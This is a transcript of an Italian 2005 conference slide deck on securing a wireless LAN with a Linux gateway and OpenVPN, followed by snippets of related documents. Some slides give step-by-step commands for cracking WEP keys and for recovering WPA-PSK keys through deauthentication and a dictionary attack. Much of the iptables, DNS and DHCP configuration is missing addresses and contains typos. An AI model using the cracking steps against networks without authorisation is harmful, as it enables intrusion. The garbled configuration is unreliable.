Di Giuseppe `Lan` Marocchio
|
|
- Evelina Magni
- 8 anni fa
- Visualizzazioni
Transcript
1 Linux Day 2005 SECURE WLAN GATEWAY Di Giuseppe `Lan` Marocchio
2 Indice: 1 Introduzione *Strumenti *Wifi Features *Wep, Wpa *Cracking the Wlan 2 Inizio Lavori *Infrastruttura *Linux box *Openvpn *Configurazione dei client (Win/Linux) *Tuning del sistema 3 Chiusura lavori *Troubleshooting *Domande & Risposte
3 Introduzione Quali Apparati abbiamo a disposizione per costruire una rete Wifi? -Access Points -Adattatori a/b/g -Bridge -Repeater
4 Introduzione Note Tecniche Cosa caratterizza propriamente una rete Wifi? -Identificativo di rete SSID -Modalità di funzionamento: Ad hoc o Managed -Utilizzo di Crittografia (è buona norma) Un apparecchio Wifi trasmette su frequenze di 2.4Ghz con la potenza massima consentita dalla legge italiana di 100mW, sono inoltre disponibili 11 canali (13) per l'utilizzo contemporaneo di più access points nella stessa Area.
5 Introduzione - WEP Il Wired Equivalent Privacy (WEP) è parte dello standard IEE (ratificato nel 1999 ) è stato progettato per fornire una sicurezza comparabile a quelle delle normali LAN basate su cavo. Purtroppo seri difetti sono stati scoperti nella particolare implementazione dell'algoritmo crittografico utilizzato per rendere sicure le comunicazioni. Questo ha reso necessario una revisione del WEP che adesso viene considerato un sottoinsieme del più sicuro standard WPA. Il WEP viene ritenuto il minimo indispensabile per impedire a un utente casuale di accedere alla rete locale. Dettagli WEP usa l'algoritmo di cifratura stream RC4 per la sicurezza e utilizza il CRC-32 per verificare l'integrità dei dati. Nello specifico l'rc4 del WEP utilizza due chiavi, a 40 bit e a 104 bit. A queste vengono aggiunti 24 bit per inizializzare il vettore quando viene trasmesso in chiaro.
6 Introduzione - WEP Difetti Cam Winget e altri (2003) segnalarono che il WEP aveva una serie di debolezze. In particolari due erano molto gravi: La prima era che l'utilizzo del WEP era opzionale e quindi moltissimi utilizzatori non lo attivavano esponendo la propria rete locale a qualsiasi utente dotato di una scheda di rete senza fili. La seconda debolezza era legata al fatto che il protocollo non includeva una gestione delle chiavi utilizzate per la codifica dei messaggi. Questo, insieme alla constatazione che le chiavi utilizzabili per cifrare i messaggi erano poche, esponeva il WEP a molte tipologie di attacchi. E` quindi possibile analizzando il traffico di ua WLAN ottenere in breve tempo (poche ore) la chiave utilizzata per cifrare la rete locale.
7 Introduzione - WPA Wi-Fi Protected Access (WPA) è un protocollo per la sicurezza delle reti Wi-Fi creato per tamponare i problemi del WEP. Il WPA implementa parte del protocollo IEE802.11i e rappresenta un passaggio intermedio per il raggiungimento della piena sicurezza. WPA è progettato per utilizzare lo standard IEE802.1x per gestire l'autentificazione delle macchine e la distribuzione di differenti chiavi per ogni utente, tuttavia per questioni di compatibilità supporta la precedente gestione a chiave condivisa (PSK). I dati sono cifrati col l'algoritmo a blocchi RC4 con chiave a 128 bit e vettore di inizializzazione a 48 bit. Una delle modifiche che introducono maggiore robustezza all'algoritmo è l'inserimento del Temporal Key Integrity Protocol (TKIP). Questo protocollo dinamicamente cambia la chiave in uso. Questo combinato con il V.I. di dimensione doppia rende inefficaci e metodi di attacco utilizzati contro il WEP.
8 Introduzione - WPA In sostanza il WPA aumenta la dimensione della chiave, il numero delle chiavi in uso, include un sistema per verificare l'autenticità dei messaggi migliore e quindi incrementa la sicurezza della WLAN rendendola effettivamente analoga a quella di una rete su cavo. La Wi-Fi Alliance (gruppo che gestisce lo standard Wi Fi) ha dichiarato che utilizzerà il termine WPA2 per identificare i dispositivi che avranno il pieno supporto dello standard IEE802.11i. Wi-Fi Alliance ha introdotto i termini WPA-Personal e WPAEnterprise per differenziare due classi di prodotti. i WPAPersonal utilizzeranno il metodo PSK a chiave condivisa mentre i WPA-Enterprise utilizzeranno un server di autentificazione (RADIUS). Questo per differenziare le due classi di sicurezza.
9 Introduzione Cracking WEP (0) Strumenti a disposizione: -Laptop con Linux -Scheda Wifi compatibile (nel nostro caso una Prism 54g riconosciuta come ethx ) -Una Rete Criptata -Un po ti Tempo a Disposizione. (2 ore in linea di massima) Scenario: Abbiamo trovato una rete protetta, abbiamo l'identificativo (BSSID) e il mac address dell'access point e di una macchina nella lan con il nostro sniffer preferito (Kismet). Azione: -Iniziamo con attivare un replicatore di pacchetti in questo modo possiamo velocizzare il Cracking della chiave. Attiviamo aireplay.sh (il nostro replicatore ) #./start-aireplay.sh
10 Introduzione Cracking WEP (1) -Ora mettiamo la Nostra scheda Wifi in monitor mode e sul canale dell'ap #iwconfig eth0 mode monitor #iwconfig eth0 channel <NUMEROCANALE> -Bene è il momento di iniziare a catturare Pacchetti Usando Airdump: #airdump eth0 pac.arch <MACDELLAP> -Per velocizzare ulteriormente il cracking della chiave dobbiamo generare altro traffico spazzatura: (ping e aireplay fanno al caso nostro) #ping -t -l ADDR_MAC_DI_UN_CLIENT #aireplay -x 512 eth0
11 Introduzione -Cracking WEP (2) -Bene dopo aver sniffatto abbastanza pacchetti (IV) è il momento di trovare la chiave wep! #aircrack -n 64 pac.arc -Pacchetti IVs richiesti per craccare il WEP 64 bit key = 25,000 a 100,000 IVs 128 bit key = 150,000 a 700,000 IVs La velocità di aircrack dipende molto dalla cpu, ci può impiegare anche più di mezzora per decriptare una chiave anche semplice. ma ricordate più pacchetti si hanno, meno tempo ci impiegherà.
12 Introduzione -Cracking WPA Scenario: Abbiamo trovato una rete protetta, abbiamo l'identificativo (BSSID) e il mac address dell'access point e di una macchina nella lan con il nostro sniffer preferito (Kismet). #airforge <mac_ap> <mac_client> deauth.cap #aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.cap eth0 Usiamo Ethereal per catturare un po di traffico, Filtriamo secondo EAPOL e salviamo in risultato in un file fermiamo pure air replay. Ora che abbiamo in traffico EAPOL usiamo cowpatty per estrarre la PSK della WLAN #cowpatty -f Dictonary.txt -r wpa -s target -v The PSK is " ".
13 Inizio lavori Come possiamo aumentare la sicurezza dei nostri dati? -Tunnel Vpn -Policy di utilizzo restrittive -ACL sui mac delle schede -Disposizione degli ap in maniera intelligente -Timer sull'accensione e lo spegnimento degli Access Points
14 . Tunnel Vpn Esistono vari applicativi che implementano una Vpn Multi punto. La mia scelta è stata di utilizzare OpenVpn, un prodotto OpenSource ( ) relativamente semplice, Ben programmato e adattabile ai più svariati utilizzi. Disponibile per: Linux, Windows 2000/XP, OpenBSD, FreeBSD, NetBSD, Mac OS X, e Solaris. OpenVpn può funzionare in modalità client o server. È un prodotto mantenuto regolarmente e che vanta una buona diffusione anche nei confronti di (Open/Free Swan). OpenVpn Richiede l'utilizzo dei driver Tun/tap che sono presenti nel kernel linux (spesso sotto forma di modulo) e sotto windows come eseguibile. Questi driver provvederanno a creare l'interfaccia tap0, in linux, e tun in windows.
15 Infrastruttura La Rete: Router-firewall(eth0) /24 [lan su rame]-firewall(eth1) /24 [lan su wifi]-firewall(eth2) /24 [vpn]-firewall(tap0) /24
16 Configurazione Linux Box È possibile utilizzare qualsiasi Distribuzione Linux (kernel 2.4 o 2.6), la macchina in questione deve possedere almeno 3 NIC. Nell'implementazione reale è stata usata la distribuzione Gentoo con kernel 2.6, gli applicativi installati sono: -syslog-ng (Logging) -iptables (Filtering) -openvpn -nmap (può essere utile) -vim (senza questo non si inizia nemmeno) -sshd (Shell Remota) -bind (DNS) La macchina utilizzata è un p2 400mhz con 256mb di ram: fegato ~ # lspci 0000:00:00.0 Host bridge: Intel Corp. 440BX/ZX/DX BX/ZX/DX Host bridge (rev 03) 0000:00:01.0 PCI bridge: Intel Corp. 440BX/ZX/DX BX/ZX/DX AGP bridge (rev 03) 0000:00:0d.0 Ethernet controller: Intel Corp /8/9 [Ethernet Pro 100] (rev 08) 0000:00:0f.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 64) 0000:00:0e.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 64) 0000:00:14.0 ISA bridge: Intel Corp AB/EB/MB PIIX4 ISA (rev 02) 0000:00:14.1 IDE interface: Intel Corp AB/EB/MB PIIX4 IDE (rev 01) 0000:00:14.2 USB Controller: Intel Corp AB/EB/MB PIIX4 USB (rev 01) 0000:00:14.3 Bridge: Intel Corp AB/EB/MB PIIX4 ACPI (rev 02) 0000:01:00.0 VGA compatible controller: ATI Technologies Inc 3D Rage Pro AGP 1X/2X (rev 5c)
17 Configurazione Linux box Firewall Script: #!/bin/bash CLASS_LAN= /24 CLASS_WAN= /24 CLASS_VPN= /24 CLASS_WLAN= /24 LAN_IF=eth1 WAN_IF=eth0 VPN_IF=tap0 WLAN_IF=eth2 ################################### /etc/init.d/iptables stop #POLICY DI FIREWALLING iptables -P INPUT DROP iptables -P FORWARD DROP iptables -P OUTPUT ACCEPT ################################## #abilito la lan a uscire sul gw iptables -A FORWARD -s $CLASS_LAN -j ACCEPT iptables -A FORWARD -d $CLASS_LAN -m state --state ESTABLISHED,RELATED -j ACCEPT #abilito gli host della VPN a uscire su internet iptables -A FORWARD -s $CLASS_VPN -j ACCEPT iptables -A FORWARD -d $CLASS_VPN -m state --state ESTABLISHED,RELATED -j ACCEPT
18 Configurazione Linux box #abilito gli host della VPN e della LAN a comunicare tra loro iptabes -A FORWARD -s $CLASS_LAN -d $CLASS_VPN -j ACCEPT iptabes -A FORWARD -s $CLASS_VPN -d $CLASS_LAN -j ACCEPT #TRAFFICO DELLA MACCHINA Firewall iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A INPUT -p tcp --dport s $CLASS_WLAN -j ACCEPT iptables -A INPUT -p udp --dport s $CLASS_WLAN -j ACCEPT iptables -A INPUT -s $CLASS_WLAN -j DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -A INPUT -p tcp --dport 53 -j ACCEPT iptables -A INPUT -p udp --dport 53 -j ACCEPT #Logginig iptables -A INPUT -j LOG --log-prefix="input:" iptables -A OUTPUT -j LOG --log-prefix="output:" iptables -A FORWARD -j LOG --log-prefix="forward:" iptables -A FORWARD -s $CLASS_WLAN -p tcp --dport j LOG --logprefix="ac-wlan:" #abilito il forwarding degli ip echo "1" > /proc/sys/net/ipv4/ip_forward route add default gw #end of script /etc/init.d/iptables save /etc/init.d/iptables start
19 Angioletta 0wnz U
20 Configurazione Linux Box Dns server: (BIND) /etc/bind/named.conf options { directory "/var/bind"; statistics-file "/var/run/named.stat"; listen-on { /24; /24; ; }; allow-query { /24; /24; ; }; pid-file "/var/run/named/named.pid"; }; zone "." IN { type hint; file "named.ca"; }; zone "127.in-addr.arpa" IN { type master; file "pri/127.zone"; allow-update { none; }; allow-transfer { none; }; notify no; }; zone "network.local" { // Il dominio per cui il tuo server è autoritativo type master; file "pri/network.local"; // Path del file di zona relativo a /var/bind allow-transfer { ; }; //Addio AXFR :) };
21 Configurazione Linux Box DHCP server: ddns-update-style none; subnet netmask { pool { range dynamic-bootp ; } option domain-name-servers ; option routers ; authoritative; allow bootp; #hosts a cui il dhcp darà l'ip specificato host FileServer { hardware ethernet 00:0C:6E:10:26:36; fixed-address ; } } cat /etc/conf.d/dhcp IFACE="eth1" DHCPD_OPTS="-q"
22 Configurazione OpenVpn (1) Ora andiamo a rifinire la configurazione del server, configurando appositamente OpenVpn in modalità server per gestire l'autenticazione degli utenti alla Rete. OpenVpn si incaricherà il compito di dare un indirizzo ip (della classe privata riservata agli host autenticati), un server Dns (la nostra linux box), e un gateway funzionante (il nostro router) All'interfaccia tun/tap del Client
23 Configurazione OpenVpn (2) Generiamo i certificati che serviranno ad OpenVpn intestino ~ #openvpn --genkey --secret ta.key #Aggiustate i parametri secondo preferenza intestino ~ #cd /root/easy-rsa intestino ~ #./clean-all intestino ~ #./build-dh # Generiamo dh2048.pem intestino ~ #cp /root/easy-rsa/dh2048.pem /etc/openvpn/intestino/ intestino ~ #./clean-all intestino ~ #./build-req gateway intestino ~ #cp /root/easy-rsa/gateway.key /etc/openvpn/intestino/ #per finire verifichiamo il tutto: intestino PWD #openssl verify -CAfile ca.crt -purpose sslserver gateway.crt #OpenVpn config File: Port 1194 dev tap tls-server cd ca /etc/openvpn/intestino/ca.crt cert /etc/openvpn/intestino/gateway.crt key /etc/openvpn/intestino/gateway.key dh /etc/openvpn/intestino/dh2048.pem tls-auth /etc/openvpn/intestino/ta.key 0 mode server duplicate-cn ifconfig # ip firewall
24 Configurazione OpenVpn (3) Ifconfig-pool # ip range dei client push "dhcp-option DNS " #indico il dns da usare push "dhcp-option DNS " #indico il dns (secondario) da usare push "route-gateway " # default gateway mtu-test tun-mtu 1500 tun-mtu-extra 32 mssfix 1450 ping 10 ping-restart 120 push "ping 10" push "ping-restart 60" comp-lzo status /etc/openvpn/intestino/openvpn-status.log verb 4 Abbiamo finito il Server!!! #/etc/init.d/openvpn start #rc-update -a openvpn default
25 Configurazione OpenVpn (4) Configurazione Client Windows: Install: openvpn-2.0-install.exe ################################# port 1194 dev tap remote tls-client ca ca.crt cert client.crt key client-key.txt tls-auth ta-key.txt 1 mtu-test tun-mtu 1500 tun-mtu-extra 32 mssfix 1450 pull comp-lzo verb 4 ################################# (Documenti\client.ovpn)
26 Configurazione OpenVpn (5) Configurazione Client Linux: ########################### port 1194 dev tap remote tls-client ca /etc/openvpn/client/ca.crt cert/etc/openvpn/client/client.crt key /etc/openvpn/client/client.key tls-auth ta.key 1 mtu-test tun-mtu 1500 tun-mtu-extra 32 mssfix 1450 pull comp-lzo verb 4 ################################# Verifichiamo il Certificato e Attiviamo il tunnel: openssl verify -CAfile ca.crt -purpose sslclient client.crt /etc/init.d/openvpn start
27 Configurazione - tuning Ora non ci resta che provare il tutto apportando modifiche ove necessario, è utile provare il sistema in situazioni di stress come Traffico, di tentativi multipli di autenticazione al sistema (DoS), cracking della chiave WEP/WPA, utilizzi maliziosi in genere. Insomma tutte le Azioni possibili che vi vengono in mente! Altra cosa utile è il monitoring via snmp per la generazione di grafici (cacti) relativi al traffico delle interfacce, Carico del sistema, utilizzo memoria. Sono tutti strumenti UTILI per un buona gestione.
28 Chiusura Lavori Bibliografia: -forums.gentoo.org Si ringraziano: -Gli amici di AzzurraNet -Gli amici di verona.linux.it -I compagni della Metro Olografix Le slide saranno disponibili a breve su ww.lanweb.org
29 Chiusura lavori Domande... (Se c'è tempo)
30 Chiusura Lavori EOF
Servizio Sistemi Informativi SPERIMENTAZIONE DI RETI PRIVATE VIRTUALI CON L'UTILIZZO DI SOFTWARE OPEN SOURCE
Servizio Sistemi Informativi SPERIMENTAZIONE DI RETI PRIVATE VIRTUALI CON L'UTILIZZO DI SOFTWARE OPEN SOURCE Redatto: Nucleo Gestione Innovazione e fornitori IT Versione: 1.0 Data emissione: 9/11/2006
DettagliFirewall e NAT A.A. 2005/2006. Walter Cerroni. Protezione di host: personal firewall
Firewall e NAT A.A. 2005/2006 Walter Cerroni Protezione di host: personal firewall Un firewall è un filtro software che serve a proteggersi da accessi indesiderati provenienti dall esterno della rete Può
DettagliLaboratorio di Reti Esercitazione N 2-DNS Gruppo 9. Laboratorio di Reti Relazione N 2. Mattia Vettorato Alberto Mesin
Laboratorio di Reti Relazione N 2 Gruppo N 9 Mattia Vettorato Alberto Mesin Scopo dell'esercitazione Configurare un Name Server per un dominio, in particolare il nostro dominio sarà gruppo9.labreti.it.
DettagliSicurezza nelle reti
Sicurezza nelle reti Manipolazione indirizzi IP 1 Concetti Reti Rete IP definita dalla maschera di rete Non necessariamente concetto geografico Non è detto che macchine della stessa rete siano vicine 2
DettagliSicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it
Sicurezza delle reti wireless Alberto Gianoli alberto.gianoli@fe.infn.it Concetti di base IEEE 802.11: famiglia di standard tra cui: 802.11a, b, g: physical e max data rate spec. 802.11e: QoS (traffic
DettagliEsercitazione 05. Sommario. Packet Filtering [ ICMP ] Esercitazione Descrizione generale. Angelo Di Iorio (Paolo Marinelli)
Sommario Esercitazione 05 Angelo Di Iorio (Paolo Marinelli)! Packet Filtering ICMP! Descrizione esercitazione! Applicazioni utili: " Firewall: wipfw - netfilter " Packet sniffer: wireshark!"#!$#!%&'$(%)*+,')#$-!"#!$#!%&'$(%)*+,')#$-
DettagliCrittografia e sicurezza delle reti. WEP: Wired Equivalent Privacy
Crittografia e sicurezza delle reti WEP: Wired Equivalent Privacy Stream Ciphers Inizia con una chiave segreta ( seed ) Genera uno stream di byte (Keystream): byte i dello stream è funzione della chiave
DettagliTransparent Firewall
Transparent Firewall Dallavalle A. Dallavalle F. Sozzi 18 Febbraio 2006 In un sistema operativo Linux con un kernel aggiornato alla versione 2.6.x è possibile realizzare un transparent firewall utilizzando
DettagliWi-Fi, la libertà di navigare in rete senza fili. Introduzione.
Wi-Fi, la libertà di navigare in rete senza fili. Introduzione. L evoluzione delle tecnologie informatiche negli ultimi decenni ha contribuito in maniera decisiva allo sviluppo del mondo aziendale, facendo
Dettagliesercizi su sicurezza delle reti 2006-2008 maurizio pizzonia sicurezza dei sistemi informatici e delle reti
esercizi su sicurezza delle reti 20062008 maurizio pizzonia sicurezza dei sistemi informatici e delle reti 1 supponi i fw siano linux con iptables dai una matrice di accesso che esprima la policy qui descritta
DettagliTre catene (chains) di base, si possono definire altre catene (convenzionalmente in minuscolo)
iptables passo-passo Prima del kernel 2.0 ipfwadm, dal kernel 2.2 ipchains, dopo il kernel 2.4 iptables Firewall (packet filtering, Nat (Network Address Translation)) NetFilter (layer del kernel per il
DettagliLa VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I
La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni
DettagliReti. Reti. IPv4: concetti fondamentali. arp (address resolution protocol) Architettura a livelli (modello OSI)
Reti Architettura a livelli (modello OSI) Prevede sette livelli: applicazione, presentazione, sessione, trasporto, rete, collegamento dei dati (datalink), fisico. TCP/IP: si può analizzare in maniera analoga
DettagliFirewall e Abilitazioni porte (Port Forwarding)
Firewall e Abilitazioni porte (Port Forwarding) 1 Introduzione In questa mini-guida mostreremo come creare le regole sul Firewall integrato del FRITZ!Box per consentire l accesso da Internet a dispositivi
DettagliScritto da Administrator Lunedì 01 Settembre 2008 06:29 - Ultimo aggiornamento Sabato 19 Giugno 2010 07:28
Viene proposto uno script, personalizzabile, utilizzabile in un firewall Linux con 3 interfacce: esterna, DMZ e interna. Contiene degli esempi per gestire VPN IpSec e PPTP sia fra il server stesso su gira
DettagliCreare connessioni cifrate con stunnel
ICT Security n. 24, Giugno 2004 p. 1 di 5 Creare connessioni cifrate con stunnel Capita, e purtroppo anche frequentemente, di dover offrire servizi molto insicuri, utilizzando ad esempio protocolli che
DettagliOpenVPN: un po di teoria e di configurazione
OpenVPN: un po di teoria e di configurazione Andrea Lanzi, Davide Marrone, Roberto Paleari Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007
DettagliIptables. Mauro Piccolo piccolo@di.unito.it
Iptables Mauro Piccolo piccolo@di.unito.it Iptables Iptables e' utilizzato per compilare, mantenere ed ispezionare le tabelle di instradamento nel kernel di Linux La configurazione di iptables e' molto
DettagliInizializzazione degli Host. BOOTP e DHCP
BOOTP e DHCP a.a. 2002/03 Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/~auletta/ Università degli studi di Salerno Laurea e Diploma in Informatica 1 Inizializzazione degli Host Un
DettagliSicurezza delle reti. Monga. Tunnel. Sicurezza delle reti. Monga
Sicurezza dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it Lezione XIX: Virtual Private Network a.a. 2015/16 1 cba 2011 15 M.. Creative Commons
DettagliNetworking Wireless con Windows XP
Networking Wireless con Windows XP Creare una rete wireless AD HOC Clic destro su Risorse del computer e quindi su Proprietà Clic sulla scheda Nome computer e quindi sul pulsante Cambia Digitare il nome
DettagliOrdine delle regole (1)
Ordine delle regole (1) Se scrivo: iptables -A INPUT -p icmp -j DROP e poi ping localhost Pensa prima di Cosa succede? provare E se aggiungo: iptables -A INPUT -p icmp -j ACCEPT E ancora: iptables -I INPUT
DettagliConfigurare una rete con PC Window s 98
Configurare una rete con PC Window s 98 In estrema sintesi, creare una rete di computer significa: realizzare un sistema di connessione tra i PC condividere qualcosa con gli altri utenti della rete. Anche
DettagliCollegamenti. Sistemi operativi supportati. Installazione della stampante. Collegamenti
Pagina 1 di 5 Collegamenti Sistemi operativi supportati Il CD Software e documentazione consente di installare il software della stampante sui seguenti sistemi operativi: Windows 8 Windows 7 SP1 Windows
DettagliLa VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I
La VPN con il FRITZ!Box Parte I 1 Descrizione Ogni utente di Internet può scambiare dati ed informazioni con qualunque altro utente della rete. I dati scambiati viaggiano nella nuvola attraverso una serie
DettagliLa sicurezza nelle reti wireless (Wi Fi) Dott. Ing. Antonio Tringali per ArsLogica Sistemi Srl
La sicurezza nelle reti wireless (Wi Fi) Dott. Ing. Antonio Tringali per ArsLogica Sistemi Srl 30/10/2008 Indice degli argomenti Le reti wireless di tipo Wi-Fi Tipi di rischio: Monitoraggio del traffico
DettagliProgetto e-city Sperimentazione della rete WiFi urbana
Progetto e-city Sperimentazione della rete WiFi urbana Procedure di accreditamento e di utilizzazione Di seguito si riportano alcune informazioni necessarie per l'utilizzo della rete Wifi urbana. 1) Come
DettagliElementi sull uso dei firewall
Laboratorio di Reti di Calcolatori Elementi sull uso dei firewall Carlo Mastroianni Firewall Un firewall è una combinazione di hardware e software che protegge una sottorete dal resto di Internet Il firewall
DettagliModelli di rete aziendale port forward PAT PAT NAT + PAT NAT table
Modelli di rete aziendale Abbiamo visto che una rete aziendale deve essere composta da due parti fondamentali: la DMZ e la TRUST (devono essere due subnet diverse ovviamente). La DMZ è la parte che viene
DettagliGate Manager. Come accedere alla rete di automazione da un PC (Rete cliente) COME ACCEDERE ALLA RETE DI AUTOMAZIONE DA UN PC (RETE CLIENTE)...
Come accedere alla rete di automazione da un PC (Rete cliente) COME ACCEDERE ALLA RETE DI AUTOMAZIONE DA UN PC (RETE CLIENTE)...1 1 INDICE...ERROR! BOOKMARK NOT DEFINED. 2 INTRODUZIONE...2 3 COSA VI SERVE
DettagliOpenVPN Installazione e configurazione
OpenVPN Installazione e configurazione Premessa Una VPN (Virtual Private Network) e un modo per collegare in modo sicuro due entità (host, lan) tramite una rete non dedicata pubblica e quindi non sicura
DettagliSimulazione seconda prova Sistemi e reti Marzo 2016
Ipotesi progettuali Studio medico situato in un appartamento senza reti pre-esistenti con possibilità di cablaggio a muro in canalina. Le dimensioni in gioco possono far prevedere cavi non troppo lunghi
DettagliOpenVPN, come fare VPN con SSL/TLS
ICT Security n. 30 e 31, Gennaio/Febbraio 2005 p. 1 di 9 OpenVPN, come fare VPN con SSL/TLS Nei numeri 16 e 17 di questa rivista ci eravamo occupati di IPSec, un protocollo per creare Virtual Private Network
DettagliDipartimento di Scienze Applicate
DIPARTIMENTO DI SCIENZE APPLICATE Università degli Studi di Napoli Parthenope Centro Direzionale di Napoli Isola C4 80143 Napoli dsa@uniparthenope.it P. IVA 01877320638 Dipartimento di Scienze Applicate.
DettagliW2000 WXP WVista W7 Ubuntu 9.10 VPN client - mini howto (ovvero come installare VPN client su quasi tutto)
W2000 WXP WVista W7 Ubuntu 9.10 VPN client - mini howto (ovvero come installare VPN client su quasi tutto) Augusto Scatolini (webmaster@comunecampagnano.it) Ver. 1.0 Gennaio 2010 Una Virtual Private Network
DettagliConfigurazione WAN (accesso internet)
D-Link G624T Per entrare nella configurazione del Router è necessario collegarlo tramite porta Ethernet (di rete). Nelle opzioni di configurazione della scheda di rete, in Protocollo TCP/IP lasciare l
DettagliZeroshell: VPN Lan-to-Lan. Il sistema operativo multifunzionale. creato da Fulvio.Ricciardi@zeroshell.net. www.zeroshell.net
Zeroshell: VPN Lan-to-Lan Il sistema operativo multifunzionale creato da Fulvio.Ricciardi@zeroshell.net www.zeroshell.net Assicurare la comunicazione fra due sedi ( Autore: cristiancolombini@libero.it
DettagliSicurezza nelle applicazioni multimediali: lezione 9, firewall. I firewall
I firewall Perché i firewall sono necessari Le reti odierne hanno topologie complesse LAN (local area networks) WAN (wide area networks) Accesso a Internet Le politiche di accesso cambiano a seconda della
DettagliFIREWALL: LA PROTEZIONE PER GLI ACCESSI ESTERNI
FIREWALL VPN RETI PRIVATE VIRTUALI: ACCESSO REMOTO Fondazione dell'ordine degli Ingegneri della Provincia di Milano Commissione per l'ingegneria dell'informazione ing. Gianluca Sironi FIREWALL: LA PROTEZIONE
DettagliPacket Filter in LINUX (iptables)
Packet Filter in LINUX (iptables) Laboratorio di Reti Ing. Telematica - Università Kore Enna A.A. 2008/2009 Ing. A. Leonardi Firewall Può essere un software che protegge il pc da attacchi esterni Host
DettagliIT Security 3 LA SICUREZZA IN RETE
1 IT Security 3 LA SICUREZZA IN RETE Una RETE INFORMATICA è costituita da un insieme di computer collegati tra di loro e in grado di condividere sia le risorse hardware (stampanti, Hard Disk,..), che le
DettagliTitolare del trattamento dei dati innanzi descritto è tsnpalombara.it
Decreto Legislativo 196/2003 Codice in materia di protezione dei dati personali COOKIE POLICY La presente informativa è resa anche ai sensi dell art. 13 del D.Lgs 196/03 Codice in materia di protezione
DettagliINTRODUZIONE ALLE RETI: UN APPROCCIO PRATICO
INTRODUZIONE ALLE RETI: UN APPROCCIO PRATICO okfabian@yahoo.com Fabian Chatwin Cedrati Ogni scheda di rete ha un indirizzo MAC univoco L'indirizzo IP invece viene impostato dal Sistema Operativo HUB 00:50:DA:7D:5E:32
DettagliIPSec VPN Client VPN vs serie ZyWALL con PSK e Certificati digitali
IPSec VPN Client VPN vs serie ZyWALL con PSK e Certificati digitali Il seguente documento mostra come configurare e gestire una VPN fatta attraverso il Client IPSec ZyXEL e la serie ZyWALL Questo documento
DettagliRete Mac -Pc. Mac Os X Dove inserire i valori (IP, Subnetmask, ecc) Risorse di Rete (mousedx-proprietà)>
Rete Mac -Pc Una rete può essere costituita tramite cavo o senza fili ma per far comunicare più computer all'interno di essa bisogna innanzitutto impostare i valori di rete che sono: - IP, - SUBNETMASK,
DettagliConfigurazione AP Managed
NEXT-GEN USG Wireless Controller Configurazione AP Managed Come prima operazione, da fare su tutti gli AP da connettere allo ZyWALL, è di accedere in management all Access-Point, andare nel menù Configuration>
DettagliCOME CREARE UNA LAN DOMESTICA
COME CREARE UNA LAN DOMESTICA Breve Introduzione con la sigla LAN, si intende Local Area Network, una rete virtuale che permette la comunicazione tra più computer tramite collegamento via cavo. Ciò permette
DettagliInfrastruttura wireless d Ateneo (UNITUS-WiFi)
Infrastruttura wireless d Ateneo (UNITUS-WiFi) INFORMAZIONI GENERALI...1 DESCRIZIONE DELLE RETI WIRELESS...1 COME ACCEDERE ALLA RETE WIRELESS...3 Configurazione scheda di rete...3 Accesso alla rete studenti...5
DettagliCosa è Tower. Sistema di autenticazione per il controllo degli accessi a reti wireless. struttura scalabile. permette la nomadicità degli utenti
Cosa è Tower Sistema di autenticazione per il controllo degli accessi a reti wireless struttura scalabile consente la federazione tra reti di enti/operatori t i differenti permette la nomadicità degli
DettagliInterfaccia KNX/IP Wireless GW 90839. Manuale Tecnico
Interfaccia KNX/IP Wireless GW 90839 Manuale Tecnico Sommario 1 Introduzione... 3 2 Applicazione... 4 3 Menù Impostazioni generali... 5 3.1 Parametri... 5 4 Menù Protezione WLAN... 6 4.1 Parametri... 6
DettagliSistema di accesso ad internet tramite la rete Wireless dell Università di Bologna
Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna Documento stampabile riassuntivo del servizio: la versione aggiornata è sempre quella pubblicata on line all indirizzo
DettagliGestione degli indirizzi
Politecnico di Milano Facoltà di Ingegneria dell Informazione Gestione degli indirizzi -Address Resolution Protocol (ARP) -Reverse Address Resolution Protocol (RARP) -Dynamic Host Configuration Protocol
DettagliWireless Network Esercitazioni. Alessandro Villani avillani@science.unitn.it
Wireless Network Esercitazioni Alessandro Villani avillani@science.unitn.it Security e Reti Wireless Sicurezza: Overview Open network Open network+ MAC-authentication Open network+ web based gateway WEP
DettagliCorso reti 2k7. linuxludus
Corso reti 2k7 linuxludus Lezione 1, introduzione al corso Giuseppe Marocchio (LAN) io@giuseppe-marocchio.com whoami Giuseppe Marocchio, Studente @ univr (Sci informatiche ), lavora presso un (w)isp, si
DettagliReti di Calcolatori 18-06-2013
1. Applicazioni di rete [3 pts] Si descrivano, relativamente al sistema DNS: Compito di Reti di Calcolatori 18-06-2013 a) i motivi per i quali viene usato; b) l architettura generale; c) le modalità di
DettagliSicurezza nelle applicazioni multimediali: lezione 8, sicurezza ai livelli di rete e data-link. Sicurezza ai livelli di rete e data link
Sicurezza ai livelli di rete e data link Sicurezza a livello applicativo Ma l utilizzo di meccanismi di cifratura e autenticazione può essere introdotto anche ai livelli inferiori dello stack 2 Sicurezza
DettagliGestione degli indirizzi
Politecnico di Milano Advanced Network Technologies Laboratory Gestione degli indirizzi - Address Resolution Protocol (ARP) - Reverse Address Resolution Protocol (RARP) - Dynamic Host Configuration Protocol
DettagliContenuto del pacchetto
Contenuto del pacchetto DWL-900AP Trasformatore AC Cavo USB CD d installazione Manuale utente Manuale rapido d installazione Se uno o più componenti dovessero risultare mancanti o danneggiati, contattare
DettagliLaboratorio di Networking Operating Systems. Lezione 2 Principali strumenti di diagnostica
Dipartimento di Informatica - Università di Verona Laboratorio di Networking Operating Systems Lezione 2 Principali strumenti di diagnostica Master in progettazione e gestione di sistemi di rete edizione
DettagliApprofondimenti. Contenuti
